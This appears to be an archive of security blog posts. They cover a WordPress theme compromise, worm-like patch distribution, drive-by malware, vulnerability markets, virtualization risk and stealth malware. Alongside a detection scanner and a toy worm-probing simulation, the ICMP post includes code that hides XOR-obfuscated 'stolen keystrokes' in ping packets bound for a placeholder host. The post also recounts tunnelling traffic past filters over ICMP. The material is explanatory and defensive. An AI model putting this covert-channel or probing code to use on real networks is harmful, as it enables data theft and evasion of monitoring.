Archive

Archive for the ‘Malware’ Category

Why Steeling Your Security Is Less Stainless and More Irony…

March 5th, 2012 3 comments

(I originally pre-pended to this post a lengthy update based on my findings and incident response, but per a suggestion from @jeremiahg, I’ve created a separate post here for clarity)

Earlier today I wrote about the trending meme in the blogosphere/security bellybutton squad wherein the notion that security — or the perceived lacking thereof — is losing the “war.”

My response was that the expectations and methodologies by which we measure success or failure are arbitrary and grossly inaccurate.  Furthermore, I suggested that the solutions we have at our disposal are geared toward generating revenue for vendors and toward solving short-term, point-specific problems based on prevailing threats and the appetite to combat them.

As a corollary, if you reduce this down to the basics, the tools we have at our disposal that we decry as useless often work just fine…if you actually use them.

For most of us, we do what we can to provide appropriate layers of defense where possible, but our adversaries are crafty and in many cases more skilled.  For some, this means our efforts are a lost cause, but the reality is that good enough is often good enough…until it isn’t.

Like it wasn’t today.

Let me paint you a picture.

A few days ago a Wired story titled “Is antivirus a waste of money?” hit the wires, quoting many (of my friends) as saying that security professionals don’t run antivirus.  There were discussions about efficacy, performance and usefulness. Many of the folks quoted in that article also run Macs.  There was also some interesting banter on Twitter.

If we rewind a few weeks, I was contacted by two people a few days apart, one running a FireEye network-based anti-malware solution and another running a mainstream host-based anti-virus solution.

Both of these people let me know that their solutions detected and blocked a Javascript-based redirection attempt from my blog which runs a self-hosted WordPress installation.

I pawed through my blog’s PHP code, turned off almost every plug-in, ran the exploit scanner…all the while unable to reproduce the behavior on my Mac or within a fresh Windows 7 VM.

The FireEye alert was ultimately reported back as a false positive, and the detection from the host-based AV solution couldn’t be reproduced, either.

Fast forward to today and after I wrote the blog “You know what’s dead? Security…” I had a huge number of click-throughs from my tweet.

The point of my blog was that security isn’t dead and we aren’t so grossly failing but rather suffering a death from a thousand cuts.  However, while we’ve got a ton of band-aids, it doesn’t make it any less painful.

Speaking of pain, almost immediately upon posting the tweet, I received reports from 5-6 people indicating their AV solutions detected an attempted malicious code execution, specifically a Javascript redirector.

This behavior was consistent with the prior “sightings,” so with the help of @innismir and @chort0, I set about trying to reproduce the event.

@chort0 found that a hidden iFrame was redirecting to a site hosted in Belize (screen caps later) that ultimately linked to other sites in Russia and produced a delightful greeting which said “Gotcha!” after attempting to drop an executable.

Again, I was unable to duplicate the behavior, and it seemed that once loaded, the iFrame and file dropper did not reappear.  @innismir didn’t get the iFrame but grabbed the dropped file.

Further investigation suggested this was likely an embedded compromise within the theme I was using.  @innismir found that the Sakura theme included “…woo-tumblog [which] uses a old version of TimThumb, which has a hole in it.”
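For anyone who wants to do a similar sweep of their own wp-content tree, here’s a minimal sketch of the kind of grep-fu we were doing by hand.  The patterns (hidden iFrames, eval’d base64 blobs) are generic indicators of a compromised theme or plug-in, not the exact strings from this incident, and the default path is just an assumption:

```python
#!/usr/bin/env python3
"""Minimal sketch: scan a WordPress theme/plugin tree for the kinds of
injected payloads discussed above. Patterns and paths are illustrative."""

import re
import sys
from pathlib import Path

# Generic indicators often seen in compromised themes/plugins.
SUSPICIOUS = [
    re.compile(r'<iframe[^>]+(?:display\s*:\s*none|height=["\']?0)', re.I),
    re.compile(r'eval\s*\(\s*base64_decode\s*\(', re.I),
    re.compile(r'document\.write\s*\(\s*unescape\s*\(', re.I),
]

def scan(root: str) -> None:
    for path in Path(root).rglob("*"):
        if path.suffix.lower() not in {".php", ".js", ".html"}:
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for pat in SUSPICIOUS:
            for m in pat.finditer(text):
                line_no = text.count("\n", 0, m.start()) + 1
                print(f"{path}:{line_no}: matches {pat.pattern!r}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else "wp-content")
```

It won’t catch a clever attacker, but it would have flagged this particular flavor of injected redirector in seconds.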

I switched back to a basic built-in theme and turned off the remainder of the non-critical plug-ins.

Since I have no way of replicating the initial drop attempt, I can only hope that this exercise, which involved some basic AV tools, some browser debug tools, some PCAP network traces and good ole investigation from three security wonks, has paid off…

ONLY YOU CAN PREVENT MALWARE FIRES (so please let me know if you see an indication of an attempted malware infection.)

Now, back to the point at hand…I would never have noticed this (or, more specifically, others wouldn’t have) had they not been running AV.

So while many look at these imperfect tools as a failure because they don’t detect/prevent all attacks, imagine how many more people I may have unwittingly infected.

Irony?  Perhaps, but what happened following the notification gives me more hope (in the combination of people, community and technology) than contempt for our gaps as an industry.

I plan to augment this post with more details and a conclusion about what I might have done differently once I have a moment to digest what we’ve done and try and confirm if it’s indeed repaired.  I hope it’s gone for good.

Thanks again to those of you who notified me of the anomalous behavior.

What’s scary is how many of you didn’t.

Is security “losing?”

Ask me in the morning…I’ll likely answer that from my perspective, no, but it’s one little battle at a time that matters.

/Hoff


A Worm By Any Other Name Is…An Information Epidemic?

February 18th, 2008 2 comments

Martin McKeay took exception to some interesting Microsoft research suggesting that the methodologies and tactics used by malicious software such as worms and viruses could also be used as an effective distributed defense against them:

Microsoft researchers are hoping to use "information epidemics" to distribute software patches more efficiently.

Milan Vojnović and colleagues from Microsoft Research in Cambridge, UK, want to make useful pieces of information such as software updates behave more like computer worms: spreading between computers instead of being downloaded from central servers.

The research may also help defend against malicious types of worm, the researchers say.

Software worms spread by self-replicating. After infecting one computer they probe others to find new hosts. Most existing worms randomly probe computers when looking for new hosts to infect, but that is inefficient, says Vojnović, because they waste time exploring groups or "subnets" of computers that contain few uninfected hosts.

Despite the really cool moniker (information epidemic), this isn’t a particularly novel distribution approach and, in fact, we’ve seen malware do this.  However, it is interesting to see that an OS vendor (Microsoft) is continuing to actively engage in research to explore this approach despite the opinions of others who simply claim it’s a bad idea.  I’m not convinced either way, however.

I, for one, am all for resilient computing environments that are aware of their vulnerabilities and can actively defend against them.  I will be interested to see how this new paper builds off of work previously produced on the subject and its corresponding criticism.

Vojnović’s team have designed smarter strategies that can exploit the way some subnets provide richer pickings than others.

The ideal approach uses prior knowledge of the way uninfected computers are spread across different subnets. A worm with that information can focus its attention on the most fruitful subnets – infecting a given proportion of a network using the smallest possible number of probes.

But although prior knowledge could be available in some cases – a company distributing a patch after a previous worm attack, for example – usually such perfect information will not be available. So the researchers have also developed strategies that mean the worms can learn from experience.

In the best of these, a worm starts by randomly contacting potential new hosts. After finding one, it uses a more targeted approach, contacting only other computers in the same subnet. If the worm finds plenty of uninfected hosts there, it keeps spreading in that subnet, but if not, it changes tack.
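To make the difference between the two probing strategies concrete, here is a toy simulation of the idea described in that last paragraph.  The subnet count, "richness" values and give-up threshold are all invented for illustration; this is a sketch of the concept, not the researchers’ actual model:

```python
import random

random.seed(1)

# Toy model: 32 subnets of 256 hosts each. The fraction of hosts worth
# reaching (e.g. unpatched machines) varies a lot by subnet.
RICHNESS = [0.6, 0.3, 0.05, 0.02] * 8
SUBNETS = [[random.random() < p for _ in range(256)] for p in RICHNESS]
TOTAL_TARGETS = sum(sum(net) for net in SUBNETS)

def random_strategy(goal):
    """Probe hosts uniformly at random across the whole address space."""
    reached, probes, hit = 0, 0, set()
    while reached < goal:
        s, h = random.randrange(len(SUBNETS)), random.randrange(256)
        probes += 1
        if (s, h) not in hit and SUBNETS[s][h]:
            hit.add((s, h))
            reached += 1
    return probes

def adaptive_strategy(goal, give_up_after=20):
    """Stay inside a subnet while it keeps paying off; after a run of
    misses, change tack and pick a new subnet ('learn from experience')."""
    reached, probes, hit = 0, 0, set()
    while reached < goal:
        s = random.randrange(len(SUBNETS))
        misses = 0
        while misses < give_up_after and reached < goal:
            h = random.randrange(256)
            probes += 1
            if (s, h) not in hit and SUBNETS[s][h]:
                hit.add((s, h))
                reached += 1
                misses = 0
            else:
                misses += 1
    return probes

goal = TOTAL_TARGETS // 2  # "infect" (or patch) half the reachable targets
print("reachable targets:", TOTAL_TARGETS)
print("random probes:    ", random_strategy(goal))
print("adaptive probes:  ", adaptive_strategy(goal))
```

Run it and the adaptive strategy reaches the same coverage with noticeably fewer probes, which is the whole pitch: efficiency, whether the payload is a patch or a worm.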

That being the case, here’s some of Martin’s heartburn:

But the problem is, if both beneficial and malign software show the same basic behavior patterns, how do you differentiate between the two? And what’s to stop the worm from being mutated once it’s started, since bad guys will be able to capture the worms and possibly subverting their programs.

The article isn’t clear on how the worms will secure their network, but I don’t believe this is the best way to solve the problem that’s being expressed. The problem being solved here appears to be one of network traffic spikes caused by the download of patches. We already have a widely used protocols that solve this problem, bittorrents and P2P programs. So why create a potentially hazardous situation using worms when a better solution already exists. Yes, torrents can be subverted too, but these are problems that we’re a lot closer to solving than what’s being suggested.

I don’t want something that’s viral infecting my computer, whether it’s for my benefit or not. The behavior isn’t something to be encouraged. Maybe there’s a whole lot more to the paper, which hasn’t been released yet, but I’m not comfortable with the basic idea being suggested. Worm wars are not the way to secure the network.

I think that some of the points that Martin raises are valid, but I also think that he’s reacting mostly out of fear to the word ‘worm.’  What if we called it "distributed autonomic shielding?" 😉

Some features/functions of our defensive portfolio are going to need to become more self-organizing, autonomic and intelligent and that goes for the distribution of intelligence and disposition, also.  If we’re not going to advocate being offensive, then we should at least be offensively defensive.  This is one way of potentially doing this.

Interestingly, this dovetails with some discussions we’ve had recently with Andy Jaquith and Amrit Williams; the notion of herds or biotic propagation and response is really quite fascinating.  See my post titled "Thinning the Herd & Chlorinating the Gene Pool."

I’ve left out most of the juicy bits of the story so you should go read it and churn on some of the very interesting points raised as part of the discussion.

/Hoff

Update: Schneier thinks this is a lousy idea. That doesn’t move me in one direction or the other, but I think this is cementing my opinion that had the author not used the word ‘worm’ in his analogy, the idea might not have been dismissed so quickly…

Also, Wismer via a comment on Martin’s blog pointed to an interesting read from Vesselin Bontchev titled "Are "Good" Computer Viruses Still a Bad Idea?"

Update #2: See the comments section about how I think the use case argued by Schneier et al. is, um, slightly missing the point.  Strangely enough, check out the Network World article that just popped up, which says: "This was not the primary scenario targeted for this research," according to a statement.

Duh.

Google Security: Frightening Statistics On Drive-By Malware Downloads…

February 12th, 2008 1 comment

Read a scary report from Google’s security team today titled "All your iFrame Are Point to Us" regarding the evolving trends in search-delivered drive-by malware downloads.  Check out the full post here, but the synopsis follows:

It has been over a year and a half since we started to identify web pages that infect vulnerable hosts via drive-by downloads, i.e. web pages that attempt to exploit their visitors by installing and running malware automatically. During that time we have investigated billions of URLs and found more than three million unique URLs on over 180,000 web sites automatically installing malware. During the course of our research, we have investigated not only the prevalence of drive-by downloads but also how users are being exposed to malware and how it is being distributed. Our research paper is currently under peer review, but we are making a technical report [PDF] available now.  Although our technical report contains a lot more detail, we present some high-level findings here:

The above graph shows the percentage of daily queries that contain at least one search result labeled as harmful. In the past few months, more than 1% of all search results contained at least one result that we believe to point to malicious content and the trend seems to be increasing.
Ugh.  The technical report offers some really good background data on infrastructure and methodology,  geographic distribution, properties and delivery mechanisms.  Fascinating reading.

/Hoff

Categories: Google, Malware Tags:

The Russian Business Network, ShadowCrew, HangUp Team, 76service, “Malware as a Service” (MaaS) and “Hoff is Thirsty.”

October 9th, 2007 6 comments

Scott Berinato posted the first of three installments of an exposé highlighting the economics of the malware industry in CSO magazine.  It’s a fascinating read with a blow-by-blow of how Don Jackson of SecureWorks infiltrated a malware distribution cartel and got to witness firsthand the dynamics of the malware marketplace as a functional economy.

It demonstrates really well the evolution of a stratified distribution system that mimics the drug trade.

What really made the story, however, was this incredible quote from yours truly.  Prepare to be awed.  I know I was.

Here’s the setup:

“Do you have a credit card? They’ve got it,” states another researcher who used to write malware for a hacking group and who now works intelligence on the Internet underground and could only speak anonymously to protect his cover. “I’m not exaggerating. Your numbers will be compromised four or five times, even if they’re not used yet.”

Here’s my earth-shattering revelation:

“I take for granted everything I do on the Internet is public and everything in my wallet is owned,” adds Chris Hoff, the security strategist at Crossbeam and former CISO of Westcorp, a $25 billion financial services company. “But what do I do? Do I pay for everything in cash like my dad? I defy you to do that. I was at a hotel recently and I couldn’t get a bottle of water without swiping my credit card. And I was thirsty! What was I gonna do?”

…and now we finish with the closer.   

That’s the thing about this wave of Internet crime. Everyone has apparently decided that it’s an unavoidable cost of doing business online, a risk they’re willing to take, and that whatever’s being lost to crime online is acceptable loss. Banks, merchants, consumers, they’re thirsty! What are they gonna do?

See what I mean!?  Without that little statement about being parched, the whole malware story just doesn’t hang together.

At all.

Don Jackson and his little sleuthy malware research don’t have ANYTHING on my horrific experience trying to extract a bottle of Aquafina liquid refreshment from a vending machine on the 23rd floor of a Scottish hotel.

Wait until the second installment when I talk about Mayonnaise.

Journalists: Please email me immediately, as I’m available NOW as your go-to source for nonsensical non-sequiturs that make your editorials just SCREAM!  Need to get to 800 words and got nuthin’?  Call the Hoff.

Wow.

/Hoff

P.S. I’m not @ Crossbeam anymore.  I was the Chief Security Strategist. It was "WesCorp."  My dad is dead.  The rest is accurate, however…except I keep getting quoted as saying "gotta."  I swear, it’s my accent!  I don’t say "gotta."  Really.

Categories: Malware Tags:

Fat Albert Marketing and the Monetizing of Vulnerability Research

July 8th, 2007 No comments

Over the last couple of years, we’ve seen the full spectrum of disclosure and "research" portals arrive on the scene; examples range from the Malware Distribution Project to 3Com/TippingPoint’s Zero Day Initiative.  Both of these examples illustrate ways of monetizing the output of vulnerability research.

Good, bad or indifferent, one would be blind not to recognize that these services are changing the landscape of vulnerability research and pushing the limits which define "responsible disclosure."

It was only a matter of time until we saw the mainstream commercial emergence of the open vulnerability auction which is just another play on the already contentious marketing efforts blurring the lines between responsible disclosure for purely "altruistic" reasons versus commercial gain.

Enter Wabisabilabi, the eBay of Zero Day vulnerabilities.

This auction marketplace for vulnerabilities is marketed as a Swiss "…Laboratory & Marketplace Platform for Information Technology Security" which "…helps customers defend their databases, IT infrastructure, network, computers, applications, Internet offerings and access."

Despite a name which sounds like Mushmouth from Fat Albert created it (it’s Japanese in origin, according to the website) I am intrigued by this concept and whether or not it will take off.

I am, however, a little unclear on how customers are able to purchase a vulnerability and then become more secure in defending their assets. 

A vulnerability without an exploit, some might suggest, is not a vulnerability at all — or at least it poses little temporal risk.  This is a fundamental debate of the definition of a Zero-Day vulnerability. 

Further, a vulnerability that has a corresponding exploit but no countermeasure (patch, signature, etc.) is potentially just as useless to a customer who has no way of protecting against it.

If you can’t manufacture a countermeasure, even if you hoard the vulnerability and/or exploit, how is that protection?  I suggest it’s just delaying the inevitable.

I am wondering how long until we see the corresponding auctioning off of the exploit and/or countermeasure?  Perhaps by the same party that purchased the vulnerability in the first place?

Today, in the closed-loop subscription services offered by vendors who buy vulnerabilities, the subscribing customer gets the benefit of protection against a threat they may not even know they have.  But for those who can’t or won’t pony up the money for this sort of subscription (which is usually tied to owning a corresponding piece of hardware to enforce it), there exists a window between when the vulnerability is published and when this knowledge is made available universally.

Depending upon this delta, these services may be doing more harm than good to the greater populace.

In fact, Dave G. over at Matasano argues quite rightly that by publishing even the basic details of a vulnerability, "researchers" will be able to more efficiently locate the chunks of code wherein the vulnerability exists and release this information publicly — code that was previously not even known to have a vulnerability.

Each of these example vulnerability service offerings describes how the vulnerabilities are kept away from the "bad guys" by qualifying their intentions based upon the ability to pay for access to the malicious code (we all know that criminals are poor, right?)  Here’s what the Malware Distribution Project describes as the gatekeeper function:

Why Pay?

Easy; it keeps most, if not all of the malicious intent, outside the gates. While we understand that it may be frustrating to some people with the right intentions not allowed access to MD:Pro, you have to remember that there are a lot of people out there who want to get access to malware for malicious purposes. You can’t be responsible on one hand, and give open access to everybody on the other, knowing that there will be people with expressly malicious intentions in that group.

ZDI suggests that by not reselling the vulnerabilities but rather protecting their customers and ultimately releasing the code to other vendors, they are giving back:

The Zero Day Initiative (ZDI) is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com later provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

As if you haven’t caught on yet, it’s all about the Benjamins. 

We’ve seen the arguments ensue regarding third party patching.  I think that this segment will heat up because in many cases it’s going to be the fastest route to protecting oneself from these rapidly emerging vulnerabilities you didn’t know you had.

/Hoff

My IPS (and FW, WAF, XML, DBF, URL, AV, AS) *IS* Bigger Than Yours Is…

May 23rd, 2007 No comments

Interop has been great thus far.  One of the most visible themes of this year’s show is (not surprisingly) the hyped emergence of 10Gb/s Ethernet.  10G isn’t new, but the market is now ripe with products supporting it: routers, switches, servers and, of course, security kit.

With this uptick in connectivity, the corresponding bump in compute power thanks to Mr. Moore AND some nifty evolution of very fast, low-latency, reasonably accurate deep packet inspection (including behavioral technology), the marketing wars have begun over who has the biggest, baddest toys on the block.

Whenever this discussion arises, without question the notion of "carrier class" gets bandied about in order to essentially qualify a product as being able to withstand enormous amounts of traffic load without imposing latency. 

One of the most compelling reasons for these big pieces of iron (which are ultimately a means to an end to run software, after all) is the service provider/carrier/mobile operator market, which certainly has its fair share of challenges in terms of not only scale and performance but also security.

I blogged a couple of weeks ago regarding the resurgence of what can be described as "clean pipes" wherein a service provider applies some technology that gets rid of the big lumps upstream of the customer premises in order to deliver more sanitary network transport.

What’s interesting about clean pipes is that much of what security providers talk about today is only actually a small amount of what is actually needed.  Security providers, most notably IPS vendors, anchor the entire strategy of clean pipes around "threat protection" that appears somewhat one dimensional.

This normally means getting rid of what is generically referred to today as "malware," arresting worm propagation and quashing DoS/DDoS attacks.  It doesn’t speak at all to the need for things that aren’t purely "security" in nature, such as parental controls (URL filtering), anti-spam, P2P, etc.  It appears that, in the strictest definition, these aren’t threats?

So, this week we’ve seen the following announcements:

  • ISS announces their new appliance that offers 6Gb/s of IPS
  • McAfee announces their new appliance that offers 10Gb/s of IPS

The trumpets sounded and the heavens parted as these products were announced, touting threat protection via IPS at levels supposedly never approached before.  More appliances.  Lots of interfaces.  Big numbers.  Yet to be seen in action.  Also, to be clear, a 2U rackmount appliance that is not DC-powered and not NEBS-certified isn’t normally called "Carrier-Class."

I find these announcements interesting because even with our existing products (which run ISS and Sourcefire’s IDS/IPS software, by the way) we can deliver 8Gb/s of firewall and IPS today and have been able to for some time.

Lisa Vaas over @ eWeek just covered the ISS and McAfee announcements and she was nice enough to talk about our products and positioning.  One super-critical difference is that along with high throughput and low latency you get to actually CHOOSE which IPS you want to run — ISS, Sourcefire and shortly Check Point’s IPS-1.

You can then combine that with firewall, AV, AS, URL filtering, web app. and database firewalls and XML security gateways in the same chassis to name a few other functions — all best of breed from top-tier players — and this is what we call Enterprise and Provider-Class UTM folks.

Holistically approaching threat management across the entire spectrum is really important along with the speeds and feeds and we’ve all seen what happens when more and more functionality is added to the feature stack — you turn a feature on and you pay for it performance-wise somewhere else.  It’s robbing Peter to pay Paul.  The processing requirements necessary at 10G line rates to do IPS is different when you add AV to the mix.

The next steps will be interesting and we’ll have to see how the switch and overlay vendors rev up to make their move to have the biggest on the block.  Hey, what ever did happen to that 3Com M160?

Then there’s that little company called Cisco…

{Ed: Oops.  I made a boo-boo and talked about some stuff I shouldn’t have.  You didn’t notice, did you?  Ah, the perils of the intersection of Corporate Blvd. and Personal Way!  Lesson learned. 😉 }

 

Blue Lane VirtualShield for VMWare – Here we go…

March 19th, 2007 1 comment

Greg Ness from Blue Lane and I have known each other for a while now, and ever since I purchased Blue Lane’s first release of products a few years ago (when I was on the "other" side as a *gasp* customer) I have admired and have taken some blog-derived punishment for my position on Blue Lane’s technology.

I have zero interest in Blue Lane other than the fact that I dig their technology and products and think it solves some serious business problems elegantly and efficiently with a security efficacy that is worth its weight in gold.

Vulnerability shielding (or patch emulation…) is a provocative subject, and I’ve gone ’round and ’round with many a fine folk online; the debate normally dissolves into the intricacies of IPS vs. vulnerability shielding rather than the fact that these solutions solve a business problem in a unique way that works and is cost effective.

That’s what a security product SHOULD do.  Yet I digress.

So, back to Greg @ Blue Lane…he let me know a few weeks ago about Blue Lane’s VirtualShield offering for VMWare environments.  VirtualShield is the first commercial product that I know of that specifically tackles problems that everyone knows exist in VM environments but that everyone has, until now, sat around twirling their thumbs about.

In fact, I alluded to some of these issues in this blog entry regarding the perceived "dangers" of virtualization a few weeks ago.

In short, VirtualShield is designed to protect guest VM’s running under a VMWare ESX environment in the following manner (and I quote):

  • Protects virtualized servers regardless of physical location or patch-level;
  • Provides up-to-date protection with no configuration changes and no agent installation on each virtual machine;
  • Eliminates remote threats without blocking legitimate application requests or requiring server reboots; and
  • Delivers appropriate protection for specific applications without requiring any manual tuning.

VS basically sits on top of the hypervisor and performs a similar set of functions as the PatchPoint solution does for non-VM systems.

Specifically, VirtualShield discovers the virtual servers running on a server and profiles the VM’s, the application(s), ports and protocols utilized to build and provision the specific OS and application protections (vulnerability shielding) required to protect the VM.

I think the next section is really the key element of VirtualShield:

As traffic flows through VirtualShield inside the hypervisor, individual sessions are decoded and monitored for vulnerable conditions. When necessary, VirtualShield can replicate the function of a software security patch by applying a corrective action directly within the network stream, protecting the downstream virtual server.

As new security patches are released by software application vendors, VirtualShield automatically downloads the appropriate inline patches from Blue Lane. Updates may be applied dynamically without requiring any reboots or reconfigurations of the virtual servers, the hypervisor, or VirtualShield.
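To illustrate the general shape of that "corrective action within the network stream" idea, here’s a minimal, invented sketch.  This is emphatically not Blue Lane’s implementation; the over-long HTTP header and the length limit are made-up stand-ins for whatever vulnerable condition a real inline patch would neutralize:

```python
# Sketch of inline vulnerability shielding: correct a dangerous condition
# in-stream instead of dropping the session. The scenario (an over-long
# HTTP header) and the limit are hypothetical.

MAX_HEADER_LEN = 1024  # assumed limit a patched server would enforce

def shield_http_request(raw: bytes) -> bytes:
    """Rewrite an HTTP request so no header value exceeds the limit,
    emulating what the vendor patch would have rendered harmless."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    fixed = [lines[0]]  # request line passes through untouched
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if colon and len(value) > MAX_HEADER_LEN:
            value = value[:MAX_HEADER_LEN]  # the in-stream corrective action
        fixed.append(name + colon + value)
    return b"\r\n".join(fixed) + sep + body

if __name__ == "__main__":
    evil = (b"GET / HTTP/1.1\r\nHost: example.com\r\nX-Pad: "
            + b"A" * 5000 + b"\r\n\r\n")
    print(len(evil), "->", len(shield_http_request(evil)))
```

The downstream (unpatched) server never sees the oversized field, which is the whole point: the protection rides in the stream, not on the guest.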

While one might suggest that vulnerability shielding is not new and in some cases certain functionality can be parlayed by firewalls, IPS, AV, etc., I maintain that the manner and model in which Blue Lane elegantly executes this compensating control is unique and effective.

If you’re running a virtualized server environment under VMWare’s ESX architecture, check out VirtualShield…right after you listen to the virtualization podcast with yours truly from RSA.

/Hoff

Virtualization is Risky Business?

February 28th, 2007 6 comments

Over the last couple of months, the topic of virtualization and security (or lack thereof) continues to surface as one of the more intriguing topics of relevance in both the enterprise and service provider environments and those who cover them.  From bloggers to analysts to vendors, virtualization is a greenfield for security opportunity and a minefield for the risk models used to describe it.

There are many excellent arguments being discussed which highlight, in an ad hoc manner, the most serious risks posed by virtualization, and I find many of them accurate, compelling, frightening and relevant.  However, I find that, overall, the risk model(s) we have for gauging in relative terms the impact these new combinations of attack surfaces, vectors and actors pose are immature and incomplete.

Most of the arguments are currently based on hyperbole and anecdotal references to attacks that could happen.  It reminds me much of the ballyhooed security risks currently held up for scrutiny for mobile handsets.  We know bad things could happen, but for the most part, we’re not being proactive about solving some of the issues before they see the light of day.

The panel I was on at the RSA show highlighted this very problem.  We had folks from VMWare and RedHat in the audience who assured us that we were just being Chicken Littles and that the risk is both quantifiable and manageable today.  We also had other indications that customers felt that while the benefits of virtualization from a cost perspective were huge, the perceived downside from the unknown (mostly theoretical) risks was making them very uncomfortable.

Out of the 150+ folks in the room, approximately 20 had virtualized systems in production roles.  About 25% of them had collapsed multiple tiers of an n-tier application stack (including SOA environments) onto a single host VM.  NONE of them had yet had these systems audited by any third party or regulatory agency.

Rot Roh.

The interesting thing to me was the dichotomy between the top-down and bottom-up approaches to describing the problem.  There was lots of discussion regarding hypervisor (in)security, privilege escalation and the like, but I thought it interesting that most people were not thinking about the impact on the network and how security would have to change to accommodate it from a bottom-up (infrastructure and architecture) approach.

The notions of guest VM hopping and malware detection in hypervisors/VM’s are reasonably well discussed (yet not resolved), so I thought I would approach it from the perspective of what role, if any, the traditional network infrastructure plays in this.

Thomas Ptacek was right when he said "…I also think modern enterprises are so far from having reasonable access control between the VLANs they already use without virtualization that it’s not a “next 18 month” priority to install them." And I agree with him there.  So, I posit that if one accepts this as true then what to do about the following:

If we now see the consolidation of multiple OSes and applications on a single VM host, in which the bulk of traffic and data interchange is between the VM’s themselves, utilizes the virtual switching fabrics in the VM host and never hits the actual physical network infrastructure, where, exactly, does this leave the self-defending "network" without VM-level security functionality at the "micro-perimeters" of the VM’s?

I recall a recent Goldman Sachs security conference where I asked Jayshree Ullal from Cisco, who was presenting Cisco’s strategy regarding virtualized security, how their approach to securing the network was impacted by virtualization in the situation I describe above.

You could hear crickets chirp in the answer.

Talk amongst yourselves….

P.S. More excellent discussions from Matasano (Ptacek) here and Rothman’s bloggy.  I also recommend Greg Ness’ commentary on virtualization and security @ the HyperVisor here.

ICMP = Internet Compromise Malware Protocol…the end is near!

August 9th, 2006 5 comments

Bear with me here as I admire the sheer elegance and simplicity of what this latest piece of malware uses as its covert back channel: ICMP.  I know…nothing fancy, but that’s why I think its simplicity underscores the bigger problem we have in securing this messy mash-up of Internet connected chewy goodness.

When you think about it, even the dopiest of users knows that when they experience some sort of abnormal network access issue, they can just open their DOS (pun intended) command prompt and type "ping…" and then call the helpdesk when they don’t get the obligatory ‘pong’ response.

It’s a really useful little protocol. Good for all sorts of things like out-of-band notifications for network connectivity, unreachable services and even quenching of overly-anxious network hosts. 

Network/security admins like it because it makes troubleshooting easy and it actually forms some of the glue and crutches that folks depend upon (unfortunately) to keep their networks running…

It’s had its fair share of negative press, sure. But who amongst us hasn’t?  I mean, Smurfs are cute and cuddly, so how can you blame poor old ICMP for merely transporting them?  Ping of Death?  That’s just not nice!  Nuke Attacks!?  Floods!?

Really, now.  Aren’t we being a bit harsh?  Consider the utility of it all…here’s a great example:

When I used to go onsite for customer engagements, my webmail/POP3/IMAP and SMTP access was filtered. Outbound SSH and other types of port filtering were also usually in place, but my old friend ICMP was always there for me…so I tunneled my mail over ICMP using Loki and it worked great…and it always worked because ICMP was ALWAYS open.  Now, today’s IDS/IPS combos usually detect these sorts of tunneling activities, so some of the fun is over.

The annoying thing is that there is really no reason why the entire range of ICMP types needs to be open, and it’s not that difficult to mitigate the risk, but people don’t because they officially belong to the LBNaSOAC (Lazy Bastard Network and Security Operators and Administrators Consortium).

However, back to the topic @ hand.  I was admiring the simplicity of this newly-found data-stealing trojan that installs itself as an Internet Exploder (IE) browser helper object and ultimately captures keystrokes and screen images when accessing certain banking sites, communicating back to the criminal operators using ICMP and a basic XOR encryption scheme.  You can read about it here.
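Just to show how little machinery this takes, here is a minimal sketch of the covert-channel idea: arbitrary data XOR-obfuscated into the payload of an otherwise ordinary ICMP echo request.  The key, destination address and message are invented for illustration (and actually putting the packet on the wire requires root); this is the general technique, not the trojan’s code:

```python
# Sketch: XOR-obfuscated data carried in an ICMP echo request payload.
# Key/host/message are hypothetical; raw sockets need root privileges.

import struct

KEY = 0x5A  # hypothetical single-byte XOR key

def xor(data: bytes, key: int = KEY) -> bytes:
    return bytes(b ^ key for b in data)

def icmp_checksum(data: bytes) -> int:
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data)//2}H", data))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return ~total & 0xFFFF

def echo_request(payload: bytes, ident: int = 0x1234, seq: int = 1) -> bytes:
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)  # type 8 = echo request
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload

packet = echo_request(xor(b"stolen keystrokes go here"))
print(packet.hex())

# To actually send it (root required):
#   import socket
#   s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
#   s.sendto(packet, ("192.0.2.10", 0))
```

To a firewall that allows all ICMP, that packet is indistinguishable from a helpdesk ping unless something is actually inspecting echo payloads, which is exactly the point of the post.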

It’s a cool design.  Right, wrong or indifferent, you have to admire the creativity and ubiquity of the back channel…until, of course, you are compromised.

There are so many opportunities for the creative uses of taken-for-granted infrastructure and supporting communication protocols to suggest that this is going to be one hairy, protracted battle.

Submit your vote for the most "clever" use of common protocols/applications for this sort of thing…

Chris

100% Undetectable Malware (?)

July 23rd, 2006 No comments

I know I’m checking in late on this story, but for some reason it just escaped my radar a month or so ago when it appeared…I think that, within the context of some of the virtualization discussions in the security realm, it was interesting enough to visit.

Joanna Rutkowska, a security researcher for Singapore-based IT security firm COSEINC, posts on her Invisible Things blog some amazingly ingenious and frightening glimpses into the possibilities and security implications in terms of malware offered up by the virtualization technologies in AMD’s SVM (Secure Virtual machine)/Pacifica technology.* 

Joanna’s really talking about exploiting the virtualization capabilities of technology like Pacifica to apply stealth by moving the entire operating system into the virtualization layer (in memory — AKA "the matrix.")  If the malware itself controls the virtualization layer, then the "reality" of what is "good" versus "bad" (and detectable as such) is governed within the context of the malware itself.  You can’t detect "bad" via security mechanisms because it’s simply not an available option for the security mechanisms to do so.  Ouch.

This is not quite the same concept that we’ve seen thus far in more "traditional" (?) VM rootkits which load VMM’s below the OS level by exploiting a known vulnerability first.  With Blue Pill, you don’t *need* a vulnerability to exploit.  You should check out this story for more information on this topic such as SubVirt as described on eWeek.

Here is an excerpt from Joanna’s postings thus far:

"Now, imagine a malware (e.g. a network backdoor, keylogger, etc…)
whose capabilities to remain undetectable do not rely on obscurity of
the concept. Malware, which could not be detected even though its
algorithm (concept) is publicly known. Let’s go further and imagine
that even its code could be made public, but still there would be no
way for detecting that this creature is running on our machines…"

